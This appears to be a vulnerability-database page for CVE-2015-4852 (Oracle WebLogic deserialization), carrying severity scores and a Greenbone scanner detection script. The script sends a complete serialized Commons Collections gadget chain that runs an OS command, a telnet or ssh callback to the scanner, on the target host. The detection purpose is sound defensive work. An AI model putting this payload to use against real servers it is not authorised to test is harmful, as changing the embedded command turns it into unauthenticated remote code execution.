9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.969 High
EPSS
Percentile
99.7%
Oracle WebLogic Server is prone to a remote code-execution vulnerability.
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:bea:weblogic_server";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105829");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2015-4852");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_version("2023-12-26T05:05:23+0000");
script_name("Oracle WebLogic Server Java Deserialization Vulnerability");
script_xref(name:"URL", value:"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/");
script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html");
script_tag(name:"impact", value:"Successfully exploiting this issue allows attackers to execute arbitrary code
in the context of the affected application.");
script_tag(name:"vuldetect", value:"Send a serialized java object which try to open a ssh connection to a random
port on the scanner and then check for the tcp-syn packet from this connection.");
script_tag(name:"insight", value:"Unsafe deserialization allows unauthenticated remote attackers to run
arbitrary code on the Jboss server.");
script_tag(name:"solution", value:"Updates are available. Please see the references or vendor advisory for more information.");
script_tag(name:"summary", value:"Oracle WebLogic Server is prone to a remote code-execution vulnerability.");
script_tag(name:"affected", value:"Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_active");
script_tag(name:"last_modification", value:"2023-12-26 05:05:23 +0000 (Tue, 26 Dec 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2023-12-21 01:31:00 +0000 (Thu, 21 Dec 2023)");
script_tag(name:"creation_date", value:"2016-07-27 14:18:32 +0200 (Wed, 27 Jul 2016)");
script_category(ACT_ATTACK);
script_family("Web Servers");
script_copyright("Copyright (C) 2016 Greenbone AG");
script_dependencies("gb_oracle_weblogic_consolidation.nasl", "os_detection.nasl");
script_mandatory_keys("oracle/weblogic/detected");
script_require_ports("Services/weblogic-t3", 7001);
exit(0);
}
include("misc_func.inc");
include("host_details.inc");
include("os_func.inc");
if( ! port = get_app_port( cpe:CPE, service: "weblogic-t3" ) )
exit( 0 );
if( ! soc = open_sock_tcp( port ) )
exit( 0 );
req = 't3 12.2.1\n' +
'AS:255\n' +
'HL:19\n' +
'MS:10000000\n' +
'PU:t3://us-l-breens:7001\n\n';
send( socket:soc, data:req );
buf = recv( socket:soc, length:128 );
if( "HELO" >!< buf ) {
close( soc );
exit( 0 );
}
payload = raw_string(
0x01,0x65,0x01,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x71,0x00,
0x00,0xea,0x60,0x00,0x00,0x00,0x18,0x43,0x2e,0xc6,0xa2,0xa6,0x39,0x85,0xb5,0xaf,
0x7d,0x63,0xe6,0x43,0x83,0xf4,0x2a,0x6d,0x92,0xc9,0xe9,0xaf,0x0f,0x94,0x72,0x02,
0x79,0x73,0x72,0x00,0x78,0x72,0x01,0x78,0x72,0x02,0x78,0x70,0x00,0x00,0x00,0x0c,
0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x70,0x70,0x70,0x70,0x70,0x70,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x70,0x06,0xfe,0x01,
0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,0x6f,0x67,
0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,0x61,0x62,
0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,0xed,0x0c,
0x00,0x00,0x78,0x70,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,
0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2e,
0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,0x6f,0xe6,0xf7,0x23,0xe7,0xb8,
0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,
0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,
0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,
0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,
0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,
0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,0x69,0x74,0x6c,0x65,0x74,0x00,
0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,
0x6e,0x67,0x3b,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,0x56,0x65,0x6e,0x64,0x6f,0x72,
0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0b,0x69,0x6d,0x70,0x6c,0x56,0x65,0x72,0x73,
0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x77,0x02,0x00,0x00,0x78,0xfe,
0x01,0x00,0x00);
payload += raw_string(
0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,
0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,
0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,
0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,
0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,
0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,
0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,
0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,
0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,
0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,
0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,
0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,
0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,
0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,
0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,
0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,
0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,
0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,
0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,
0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,
0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,
0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,
0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,
0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,
0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,
0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,
0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,
0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,
0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,
0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,
0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,
0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,
0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,
0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,
0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,
0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,
0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,
0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,
0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,
0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,
0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,
0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,
0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,
0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,
0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,
0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,
0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,
0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,
0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,
0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,
0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,
0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,
0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,
0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,
0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,
0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,
0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,
0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,
0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,
0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,
0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,
0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,
0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,
0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);
lport = rand() % 64512 + 1024;
if( os_host_runs("Windows") == "yes" )
cmd = 'telnet ' + this_host() + ' ' + lport;
else
cmd = 'ssh -q -i /dev/null -p ' + lport + ' ' + this_host();
len = raw_string( strlen( cmd ) );
payload += len + cmd + raw_string(
0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,
0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,
0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,
0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,
0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,
0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,
0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,
0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,
0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,
0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,
0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,
0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);
payload += raw_string(
0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,
0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,
0x61,0x62,0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,
0xed,0x0c,0x00,0x00,0x78,0x70,0x72,0x00,0x21,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,
0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,
0x6c,0x2e,0x50,0x65,0x65,0x72,0x49,0x6e,0x66,0x6f,0x58,0x54,0x74,0xf3,0x9b,0xc9,
0x08,0xf1,0x02,0x00,0x07,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,
0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,0x64,
0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,
0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,0x6b,
0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,0x63,
0x68,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,0x61,0x67,0x65,0x73,0x74,0x00,0x27,0x5b,
0x4c,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,
0x2f,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2f,0x50,0x61,0x63,0x6b,0x61,0x67,
0x65,0x49,0x6e,0x66,0x6f,0x3b,0x78,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,
0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,
0x61,0x6c,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x97,0x22,
0x45,0x51,0x64,0x52,0x46,0x3e,0x02,0x00,0x03,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,
0x61,0x67,0x65,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0e,0x72,0x65,0x6c,0x65,
0x61,0x73,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x74,0x00,0x12,0x4c,0x6a,0x61,
0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,
0x00,0x12,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x41,0x73,0x42,
0x79,0x74,0x65,0x73,0x74,0x00,0x02,0x5b,0x42,0x78,0x72,0x00,0x24,0x77,0x65,0x62,
0x6c,0x6f,0x67,0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,
0x65,0x72,0x6e,0x61,0x6c,0x2e,0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,
0x6f,0xe6,0xf7,0x23,0xe7,0xb8,0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,
0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,
0x61,0x74,0x63,0x68,0x55,0x70,0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,
0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,
0x69,0x63,0x65,0x50,0x61,0x63,0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,
0x61,0x72,0x79,0x50,0x61,0x74,0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,
0x69,0x74,0x6c,0x65,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,
0x56,0x65,0x6e,0x64,0x6f,0x72,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0b,0x69,0x6d,
0x70,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x05,0x78,0x70,
0x77,0x02,0x00,0x00,0x78,0xfe,0x00,0xff,0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,
0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,
0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,0xde,0x12,0x1e,0x2a,0x0c,
0x00,0x00,0x78,0x70,0x77,0x46,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0x00,0x0b,0x75,0x73,0x2d,0x6c,
0x2d,0x62,0x72,0x65,0x65,0x6e,0x73,0xa5,0x3c,0xaf,0xf1,0x00,0x00,0x00,0x07,0x00,
0x00,0x1b,0x59,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x78,0xfe,0x01,0x00,
0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,
0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,
0xde,0x12,0x1e,0x2a,0x0c,0x00,0x00,0x78,0x70,0x77,0x1d,0x01,0x81,0x40,0x12,0x81,
0x34,0xbf,0x42,0x76,0x00,0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0xa5,
0x3c,0xaf,0xf1,0x00,0x00,0x00,0x00,0x00,0x78);
plen = raw_string( strlen( payload ) );
payload = raw_string( 0x00,0x00,0x09 ) + plen + payload;
filter = 'tcp and src ' + get_host_ip() + ' and dst ' + this_host() + ' and dst port ' + lport;
res = send_capture( socket:soc,
data:payload,
timeout:5,
pcap_filter:filter );
close( soc );
if( res ) {
flags = get_tcp_element( tcp: res, element: "th_flags" );
if( ( flags & TH_SYN ) ) {
report = 'It was possible to execute the command `' + cmd + '` on the remote host. The TCP-SYN request to port ' + lport + ' was then successfully captured.';
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html
www.cisa.gov/known-exploited-vulnerabilities-catalog
Known Exploited Vulnerability (KEV) catalog
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.969 High
EPSS
Percentile
99.7%